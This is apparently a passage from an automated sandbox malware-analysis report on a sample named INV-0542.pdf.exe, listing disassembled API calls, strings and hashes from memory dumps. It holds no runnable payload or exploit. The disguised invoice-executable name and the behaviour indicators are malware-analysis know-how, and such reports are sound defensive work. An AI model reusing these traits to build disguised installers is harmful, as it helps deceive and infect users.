                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                                • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                                                                                                                • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                                • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                                                                                                                APIs
                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                                                                                                                • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                                                                                                                • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                                                                                                                • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                                                                                                                • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                • String ID: !
                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                                                                                                                • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                                                                                                                • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                                                                                                                • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                                                                                                                • wsprintfW.USER32 ref: 00404E17
                                                                                                                                                                • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                                • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                                                                                                                • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                                                                                                                • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 2659869361-823278215
                                                                                                                                                                • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                                                                                                                                • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                                                                                                • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(eksegeternes), ref: 004026BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                • String ID: eksegeternes$lftninger\slangetmmerens
                                                                                                                                                                • API String ID: 1659193697-3935130602
                                                                                                                                                                • Opcode ID: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
                                                                                                                                                                • Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
                                                                                                                                                                • Opcode Fuzzy Hash: afd31bb821aa055ad9d8af94a6d235f20367bb60df0860ec40d8552edd9562e5
                                                                                                                                                                • Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040306F
                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                                                                                                                • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                                                                                                                • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                                                                                                                • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405EC9
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                                                                                                                  • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                                                                                                                • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405F71
                                                                                                                                                                • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 3248276644-823278215
                                                                                                                                                                • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                                                                                                                                • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405569
                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                                                                                                                  • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                                                                                                                • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                                                                                                                • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00403B9F
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 1100898210-823278215
                                                                                                                                                                • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                                • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                                                                                                                                • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                                                                                                                                • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E62
                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E72
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
